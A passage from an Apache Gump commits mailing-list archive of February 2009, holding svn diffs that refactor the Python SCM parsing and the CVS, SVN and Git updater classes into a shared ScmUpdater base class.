None self.packaged = False self.redistributable= False @@ -396,85 +396,8 @@ os.path.join( workspace.getSourceControlStagingDirectory(), self.getName() + '.lock')) - # :TODO: Consolidate this code, less cut-n-paste but also - # check the 'type' of the repository is appropriate for the - # use (eg. type='cvs' if referenced by CVS). if not packaged: - # We have a CVS entry, expand it... - if self.hasDomChild('cvs'): - cvs=self.getDomChild('cvs') - repoName=getDomAttributeValue(cvs,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.scms['cvs'] = ModuleCvs(cvs,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('svn'): - rdom=self.getDomChild('svn') - repoName=getDomAttributeValue(rdom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.scms['svn'] = ModuleScm(rdom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('p4'): - p4dom=self.getDomChild('p4') - repoName=getDomAttributeValue(p4dom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.scms['p4'] = ModuleP4(p4dom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) + '] in workspace on [' \ - + self.getName() + ']') - - elif self.hasDomChild('artifacts'): - adom=self.getDomChild('artifacts') - repoName=getDomAttributeValue(adom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.scms['artifacts'] = ModuleArtifacts(adom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - elif self.hasDomChild('git'): - rdom=self.getDomChild('git') - repoName=getDomAttributeValue(rdom,'repository') - if repoName: - if workspace.hasRepository(repoName): - # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo - repo.addModule(self) - self.scms['git'] = ModuleScm(rdom,repo) - else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ - + self.getName() + ']') - + self.parseScm() # Grab all notifications for notifyEntry in self.getDomChildIterator('nag'): @@ -509,6 +432,44 @@ self.setComplete(True) + def parseScm(self): + """ + Parses the child element that holds SCM information + """ + + # sorted by priority, the first matching SCM element wins + supportedScms = ['cvs', 'svn', 'p4', 'git', 'artifacts'] + for s in supportedScms: + if self.hasDomChild(s): + dom = self.getDomChild(s) + repoName = getDomAttributeValue(dom, 'repository') + if repoName: + if self.workspace.hasRepository(repoName): + # It references this repository... + repo = self.workspace.getRepository(repoName) + self.repository = repo + repo.addModule(self) + self.scm = self.createScmInstance(s, dom, repo) + else: + self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) + self.addError('No such repository ['+ str(repoName) \ + +'] in workspace on [' \ + + self.getName() + ']') + return + + + def createScmInstance(self, type, dom, repo): + """ + Factory method for matching ModuleScm subclass of given SCM + """ + if type == 'cvs': + return ModuleCvs(dom, repo) + elif type == 'p4': + return ModuleP4(dom, repo) + elif type == 'artifacts': + return ModuleArtifacts(dom, repo) + return ModuleScm(dom, repo) + def hasNotifys(self): if self.notifys: return True return False @@ -718,7 +679,8 @@ return 'http://svn.apache.org/repos/asf/gump/metadata/' + location def isUpdatable(self): - return len(self.scms) > 0 + if self.scm: return True + return False # Where the contents (at the repository) Modified? def isModified(self): @@ -746,19 +708,7 @@ return scm.getViewUrl() def getScm(self): - # this is the priority order originally present - # CVS over svn over P4 over GIT and artifacts last - - # will be swapped against a list based version later - if 'cvs' in self.scms: - return self.scms['cvs'] - if 'svn' in self.scms: - return self.scms['svn'] - if 'p4' in self.scms: - return self.scms['p4'] - if 'git' in self.scms: - return self.scms['git'] - return self.scms.get('artifacts') + return self.scm class ModuleStatistics(Statistics): """ From [email protected] Mon Feb 16 02:32:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45782 invoked from network); 16 Feb 2009 02:32:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 02:32:06 -0000 Received: (qmail 11536 invoked by uid 500); 16 Feb 2009 02:32:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11527 invoked by uid 99); 16 Feb 2009 02:32:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 15 Feb 2009 18:32:05 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 02:32:03 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D835F238896B; Mon, 16 Feb 2009 02:31:42 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744792 - /gump/trunk/python/gump/core/update/updater.py Date: Mon, 16 Feb 2009 02:31:42 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 02:31:42 2009 New Revision: 744792 URL: http://svn.apache.org/viewvc?rev=744792&view=rev Log: bring back directory sync Modified: gump/trunk/python/gump/core/update/updater.py Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=744792&r1=744791&r2=744792&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Mon Feb 16 02:31:42 2009 @@ -126,7 +126,7 @@ scmUpdater = self.getScmUpdater(module) if scmUpdater: - scmUpdater.updateModule(module) + ok = scmUpdater.updateModule(module) else: # :TODO: Now what? pass @@ -159,11 +159,10 @@ # Perform the sync... try: # Store changes next to updates log - changesFile = os.path.abspath( \ - os.path.join( \ - workspace.tmpdir, \ - 'changes_to_'\ - + gumpSafeName(module.getName())+'.txt')) + changesFile = os.path.abspath(os.path.join(workspace.tmpdir, + 'changes_to_' + \ + gumpSafeName(module.getName()) + \ + '.txt')) # Perform the operation. (actions,modified,cleaned)=syncDirectories(sourcedir,destdir,module, @@ -193,9 +192,9 @@ # Might help even with sync failures. - if os.path.exists(changesFile): - catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) - + if os.path.exists(changesFile): + catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) + return module.okToPerformWork() From [email protected] Mon Feb 16 03:29:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56961 invoked from network); 16 Feb 2009 03:29:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 03:29:27 -0000 Received: (qmail 37631 invoked by uid 500); 16 Feb 2009 03:29:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37621 invoked by uid 99); 16 Feb 2009 03:29:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 15 Feb 2009 19:29:27 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 03:29:23 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 883F3238896B; Mon, 16 Feb 2009 03:29:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744794 - in /gump/trunk/python/gump/core/update: __init__.py cvs.py git.py scmupdater.py svn.py Date: Mon, 16 Feb 2009 03:29:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 03:29:00 2009 New Revision: 744794 URL: http://svn.apache.org/viewvc?rev=744794&view=rev Log: refactor updaters in order to greatly reduce copy-n-paste Added: gump/trunk/python/gump/core/update/scmupdater.py (with props) Modified: gump/trunk/python/gump/core/update/__init__.py gump/trunk/python/gump/core/update/cvs.py gump/trunk/python/gump/core/update/git.py gump/trunk/python/gump/core/update/svn.py Modified: gump/trunk/python/gump/core/update/__init__.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/__init__.py?rev=744794&r1=744793&r2=744794&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/__init__.py (original) +++ gump/trunk/python/gump/core/update/__init__.py Mon Feb 16 03:29:00 2009 @@ -17,6 +17,6 @@ # limitations under the License. # tell Python what modules make up the gump.test package -__all__ = ["updater","cvs","svn","jars", "git"] +__all__ = ["updater","cvs","svn","jars", "git", "scmupdater"] Modified: gump/trunk/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/cvs.py?rev=744794&r1=744793&r2=744794&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/cvs.py (original) +++ gump/trunk/python/gump/core/update/cvs.py Mon Feb 16 03:29:00 2009 @@ -43,189 +43,91 @@ from gump.tool.integration.cvs import * +from gump.core.update.scmupdater import ScmUpdater ############################################################################### # Classes ############################################################################### -class CvsUpdater(RunSpecific): +class CvsUpdater(ScmUpdater): def __init__(self,run): - RunSpecific.__init__(self,run) + ScmUpdater.__init__(self,run) # # A stash of known logins. # self.logins=readLogins() - def updateModule(self,module): + def getCheckoutCommand(self, module): """ - - Perform a CVS update on a module - + Build the appropriate CVS command for checkout """ - - #log.info('Perform CVS Update on #[' + `module.getPosition()` + \ - # '] : ' + module.getName()) + self.maybeLogin(module) - # Did we 'CVS checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't tell us much... - #if exists: - # self.performStatus(module) - - self.performUpdate(module,exists) - - return module.okToPerformWork() - - def performStatus(self,module): - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, True, True) - - # Provide CVS logins, if not already there - loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - - def performUpdate(self,module,exists): - """ - Update this module (checking out if needed) - """ - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, exists) - - #log.debug("CVS Update Module " + module.getName() + \ - # ", Repository Name: " + str(module.repository.getName())) - - # Provide CVS logins, if not already there - loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed w/ CVS Root ' + root + ' for %s on Repository %s.' \ - % (module.name, module.repository.getName())) - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) + cmd = Cmd('cvs', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + self.setupCommonParameters(module, cmd) + + # do a cvs checkout + cmd.addParameter('checkout') + cmd.addParameter('-P') + self.maybeAddTag(module, cmd) + + if not module.getScm().hasModule() or \ + not module.getScm().getModule() == module.getName(): + cmd.addParameter('-d', module.getName(), ' ') + + if module.getScm().hasModule(): + cmd.addParameter(module.getScm().getModule()) else: - module.changeState(STATE_SUCCESS) - - # We run CVS as -q (quiet) so any output means - # updates occured... - if cmdResult.hasOutput(): - log.info('Update(s) received via CVS on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - def preview(self,module): - - (repository, root, command ) = self.getUpdateCommand(module,False) - command.dump() - - # Doesn't tell us much... - #(repository, root, command ) = self.getUpdateCommand(module,True,True) - #command.dump() - - (repository, root, command ) = self.getUpdateCommand(module,True) - command.dump() - - - def getUpdateCommand(self,module,exists=False,nowork=False): - """ - Format a commandline for doing the CVS update + cmd.addParameter(module.getName()) + + return cmd + + def getUpdateCommand(self, module): + """ + Build the appropriate CVS command for update """ - - if nowork and not exists: - raise RuntimeException('Not coded for this combo.') - - root=module.getScm().getCvsRoot() + + self.maybeLogin(module) - # Prepare CVS checkout/update command... - prefix='update' - directory=module.getWorkspace().getSourceControlStagingDirectory() - if exists: - directory=module.getSourceControlStagingDirectory() - if nowork: - prefix='status' - - cmd=Cmd( 'cvs', - prefix+'_'+module.getName(), - directory) + cmd = Cmd('cvs', 'update_' + module.getName(), + module.getSourceControlStagingDirectory()) + self.setupCommonParameters(module, cmd) - # Be 'quiet' (but not silent) unless requested otherwise. - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose(): + # Do a cvs update + cmd.addParameter('update') + cmd.addParameter('-P') + cmd.addParameter('-d') + self.maybeAddTag(module, cmd) + + return cmd + + def setupCommonParameters(self, module, cmd): + if self.shouldBeQuiet(module): cmd.addParameter('-q') - - if nowork: - cmd.addParameter('-n') - - # Allow trace for debug - if module.isDebug(): + elif module.isDebug(): cmd.addParameter('-t') - # Request compression cmd.addParameter('-z3') # Set the CVS root - cmd.addParameter('-d', root) - + cmd.addParameter('-d', module.getScm().getCvsRoot()) + + def maybeLogin(self, module): + repository = module.repository + root = module.getScm().getCvsRoot() + + # Provide CVS logins, if not already there + loginToRepositoryOnDemand(repository, root, self.logins) + + def maybeAddTag(self, module, cmd): # Determine if a tag is set, on <cvs or on <module - tag=None + tag = None if module.getScm().hasTag(): - tag=module.getScm().getTag() + tag = module.getScm().getTag() elif module.hasTag(): - tag=module.getTag() - - if exists: - - # Do a cvs update - cmd.addParameter('update') - cmd.addParameter('-P') - cmd.addParameter('-d') - if tag: - cmd.addParameter('-r',tag,' ') - else: - cmd.addParameter('-A') - #cmd.addParameter(module.getName()) - - else: - - # do a cvs checkout - cmd.addParameter('checkout') - cmd.addParameter('-P') - if tag: - cmd.addParameter('-r',tag,' ') - - if not module.getScm().hasModule() or \ - not module.getScm().getModule() == module.getName(): - cmd.addParameter('-d',module.getName(),' ') - - if module.getScm().hasModule(): - cmd.addParameter(module.getScm().getModule()) - else: - cmd.addParameter(module.getName()) - - return (module.repository, root, cmd) - + tag = module.getTag() + if tag: + cmd.addParameter('-r', tag, ' ') Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=744794&r1=744793&r2=744794&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Mon Feb 16 03:29:00 2009 @@ -42,165 +42,47 @@ from gump.core.model.stats import * from gump.core.model.state import * +from gump.core.update.scmupdater import ScmUpdater + ############################################################################### # Classes ############################################################################### -class GitUpdater(RunSpecific): +class GitUpdater(ScmUpdater): def __init__(self,run): - RunSpecific.__init__(self,run) + ScmUpdater.__init__(self,run) - def updateModule(self,module): - """ - Perform a GIT update on a module - """ - - log.info('Perform GIT Update on #[' + `module.getPosition()` + \ - '] : ' + module.getName()) - - # Did we 'GIT checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - self.performUpdate(module, exists) - - return module.okToPerformWork() - - def performStatus(self,module): + def getCheckoutCommand(self, module): """ - - Do a status comparison between our copy and server - + Build the appropriate GIT command for clone """ - - # need to look up how to do that with git + self.logRepositoryAndURL(module) + cmd = Cmd('git-clone', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + self.maybeMakeQuiet(module, cmd) + cmd.addParameter(module.getScm().getRootUrl()) + cmd.addParameter(module.getName()) + return cmd - def getStatusCommand(self,module): + def getUpdateCommand(self, module): """ - - Build the 'git status --show-updates --non-interative' command - + Build the appropriate GIT command for pull """ - - # need to look up how to do that with git, this is certainly wrong - - log.debug("Git Module Status : " + module.getName() + \ - ", Repository Name: " + str(module.repository.getName())) - - url=module.getScm().getRootUrl() - - log.debug("GIT URL: [" + url + "] on Repository: " + module.repository.getName()) - - # - # Prepare GIT checkout/update command... - # - cmd=Cmd('git', 'status_'+module.getName(), - module.getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose(): - cmd.addParameter('--quiet') - - # - # Allow trace for debug - # - # if module.isDebug() or module.getScm().isDebug(): - # cmd.addParameter('--verbose') - - # do an GIT status - cmd.addParameter('status') - + self.logRepositoryAndURL(module) + cmd = Cmd('git-pull', 'update_' + module.getName(), + module.getSourceControlStagingDirectory()) + self.maybeMakeQuiet(module, cmd) return cmd - - def performUpdate(self,module,exists): - """ - - Clone or Pull from GIT - - """ - - # Get the Update Command - (repository, url, cmd ) = self.getUpdateCommand(module, exists) - - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed to clone/pull module: ' + module.name) - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - - def preview(self,module): - (repository, url, command ) = self.getUpdateCommand(module,0) - command.dump() - - (repository, url, command ) = self.getUpdateCommand(module,1) - command.dump() - - def getUpdateCommand(self,module,exists=0): - """ - Build the appropriate GIT command for clone/pull - """ - repository=module.repository - - log.debug("Git Module Update : " + module.getName() + \ - ", Repository Name: " + repository.getName()) - - url=module.getScm().getRootUrl() - - log.debug("GIT URL: [" + url + "] on Repository: " + repository.getName()) - - # - # Prepare GIT clone/pull command... - # - - if exists: - # do a GIT pull inside working copy - cmd=Cmd('git-pull', 'update_'+module.getName(), - module.getSourceControlStagingDirectory()) - else: - # do a GIT clone - cmd=Cmd('git-clone', 'update_'+module.getName(), - module.getWorkspace().getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose(): + def logRepositoryAndURL(self, module): + repository = module.repository + url = module.getScm().getRootUrl() + log.debug("GIT URL: [" + url + "] on Repository: " + \ + repository.getName()) + + def maybeMakeQuiet(self, module, cmd): + if self.shouldBeQuiet(module): cmd.addParameter('--quiet') - # - # Allow trace for debug - # - # if module.isDebug() or module.getScm().isDebug(): - # cmd.addParameter('--verbose') - - if not exists: - # do an GIT pull - cmd.addParameter(url) - cmd.addParameter(module.getName()) - - return (module.repository, url, cmd) - - Added: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=744794&view=auto ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (added) +++ gump/trunk/python/gump/core/update/scmupdater.py Mon Feb 16 03:29:00 2009 @@ -0,0 +1,148 @@ +#!/usr/bin/python + + +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os.path +import sys + +from gump import log + +from gump.core.run.gumprun import * +from gump.util.note import Annotatable +from gump.core.model.workspace import * +from gump.core.model.module import Module +from gump.core.model.stats import * +from gump.core.model.state import * + +############################################################################### +# Classes +############################################################################### +class ScmUpdater(RunSpecific): + """ + Base class for a SCM specific updaters. + + Provides helpers and template method implementations. + """ + + def __init__(self,run): + RunSpecific.__init__(self, run) + + # + # "public" interface of ScmUpdater + # + + def preview(self, module): + """ + Supposed to preview what needs to be done. + + For most SCMs it doesn't say much and this method is never + called during a normal Gump run. + """ + (cmd, isUpdate) = self.getCommandAndType(module) + if cmd: + cmd.dump() + + def updateModule(self, module): + """ + Performs a fresh check-out or an update of an existing wrokspace. + """ + + log.info('Perform ' + module.getScm().getScmName() + \ + ' Checkout/Update on #[' + `module.getPosition()` + \ + '] : ' + module.getName()) + + (cmd, isUpdate) = self.getCommandAndType(module) + + if cmd: + if isUpdate: + log.debug(module.getScm().getScmName() + " Module Update : " +\ + module.getName() + ", Repository Name: " + \ + module.repository.getName()) + else: + log.debug(module.getScm().getScmName() + " Module Checkout : " +\ + module.getName() + ", Repository Name: " + \ + module.repository.getName()) + + # Execute the command and capture results + cmdResult = execute(cmd, module.getWorkspace().tmpdir) + + # Store this as work, on both the module and (cloned) on the repo + work = CommandWorkItem(WORK_TYPE_UPDATE, cmd, cmdResult) + module.performedWork(work) + module.repository.performedWork(work.clone()) + + # Update Context w/ Results + if not cmdResult.isOk(): + log.error('Failed to checkout/update module: ' + module.name) + module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) + else: + module.changeState(STATE_SUCCESS) + + return module.okToPerformWork() + + log.error("Don't know how to to checkout/update module: " + module.name) + module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) + return False + + # + # helpers + # + + def shouldBeQuiet(self, module): + """ + Whether the configuration asks for a quiet update + (it does so by default) + """ + return not module.isDebug() \ + and not module.isVerbose() \ + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose() + + + def getCommandAndType(self, module): + """ + Checks whether an update or a fresh checkout is needed and + returns a command to perform the required action. + + Returns a tuple (command, isUpdate) + """ + exists = os.path.exists(module.getSourceControlStagingDirectory()) + + cmd = None + if exists: + cmd = self.getUpdateCommand(module) + else: + cmd = self.getCheckoutCommand(module) + return (cmd, exists) + + + # + # methods that should be overridden in subclasses + # + + def getCheckoutCommand(self, module): + """ + Create the command needed to obtain a fresh working copy. + """ + return None + + def getUpdateCommand(self, module): + """ + Create the command needed to update an existing working copy. + """ + return None + Propchange: gump/trunk/python/gump/core/update/scmupdater.py ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=744794&r1=744793&r2=744794&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Mon Feb 16 03:29:00 2009 @@ -42,158 +42,39 @@ from gump.core.model.stats import * from gump.core.model.state import * +from gump.core.update.scmupdater import ScmUpdater + ############################################################################### # Classes ############################################################################### -class SvnUpdater(RunSpecific): +class SvnUpdater(ScmUpdater): def __init__(self,run): - RunSpecific.__init__(self,run) + ScmUpdater.__init__(self,run) - def updateModule(self,module): - """ - Perform a SVN update on a module - """ - - log.info('Perform SVN Update on #[' + `module.getPosition()` + \ - '] : ' + module.getName()) - - # Did we 'SVN checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't teach us much - #if exists: - # self.performStatus(module) - - self.performUpdate(module, exists) - - return module.okToPerformWork() - - def performStatus(self,module): + def getCheckoutCommand(self, module): """ - - Do a status comparison between our copy and server - + Build the appropriate SVN command for checkout """ - - # Get the Update Command - cmd = self.getStatusCommand(module) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # Store this as work - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - # Update Context w/ Results - if not cmdResult.isOk(): - message='Failed to \'status --show-updates\' module: ' + module.getName() - module.addWarning(message) - log.error(message) + return self.getCommand(module, False) - def getStatusCommand(self,module): + def getUpdateCommand(self, module): """ - - Build the 'svn status --show-updates --non-interative' command - + Build the appropriate SVN command for update """ - log.debug("SubVersion Module Status : " + module.getName() + \ - ", Repository Name: " + str(module.repository.getName())) - - url=module.getScm().getRootUrl() - - log.debug("SVN URL: [" + url + "] on Repository: " + module.repository.getName()) - - # - # Prepare SVN checkout/update command... - # - cmd=Cmd('svn', 'status_'+module.getName(), - module.getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose(): - cmd.addParameter('--quiet') - - # - # Allow trace for debug - # - # SVN complains about -v|--verbose, don't ask me why - # - # if module.isDebug() or module.svn.isDebug(): - # cmd.addParameter('--verbose') - - # do an SVN status --show-updates - cmd.addParameter('status') - cmd.addParameter('--show-updates') - - # - # Request non-interactive - # - cmd.addParameter('--non-interactive') - - return cmd + return self.getCommand(module, True) - - def performUpdate(self,module,exists): + def getCommand(self, module, forUpdate): """ - - Check-out or Update from SVN - + Build the appropriate SVN command for checkout or update """ - - # Get the Update Command - (repository, url, cmd ) = self.getUpdateCommand(module, exists) - - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) + repository = module.repository + url = module.getScm().getRootUrl() - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - - def preview(self,module): - (repository, url, command ) = self.getUpdateCommand(module,0) - command.dump() - - # Doesn't teach us much - # command = self.getStatusCommand(module) - # command.dump() - - (repository, url, command ) = self.getUpdateCommand(module,1) - command.dump() - - def getUpdateCommand(self,module,exists=0): - """ - Build the appropriate SVN command for checkout/update - """ - repository=module.repository - - log.debug("SubVersion Module Update : " + module.getName() + \ - ", Repository Name: " + repository.getName()) - - url=module.getScm().getRootUrl() - - log.debug("SVN URL: [" + url + "] on Repository: " + repository.getName()) + log.debug("SVN URL: [" + url + "] on Repository: "\ + + repository.getName()) # # Prepare SVN checkout/update command... @@ -204,25 +85,12 @@ # # Be 'quiet' (but not silent) unless requested otherwise. # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.getScm().isDebug() \ - and not module.getScm().isVerbose(): + if self.shouldBeQuiet(module): cmd.addParameter('--quiet') - # - # Allow trace for debug - # - # SVN complains about -v|--verbose, don't ask me why - # - # if module.isDebug() or module.getScm().isDebug(): - # cmd.addParameter('--verbose') - - if exists: - # do an SVN update + if forUpdate: cmd.addParameter('update') else: - # do an SVN checkout cmd.addParameter('checkout', url) # @@ -244,6 +112,4 @@ not module.getScm().getDir() == module.getName(): cmd.addParameter(module.getName()) - return (module.repository, url, cmd) - - + return cmd From [email protected] Mon Feb 16 03:56:04 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63350 invoked from network); 16 Feb 2009 03:56:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 03:56:04 -0000 Received: (qmail 48347 invoked by uid 500); 16 Feb 2009 03:56:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48338 invoked by uid 99); 16 Feb 2009 03:56:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 15 Feb 2009 19:56:04 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 03:56:01 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 26AC62388995; Mon, 16 Feb 2009 03:55:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744796 - /gump/trunk/python/gump/core/update/p4.py Date: Mon, 16 Feb 2009 03:55:39 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 03:55:39 2009 New Revision: 744796 URL: http://svn.apache.org/viewvc?rev=744796&view=rev Log: pylint assisted refactoring of Perforce 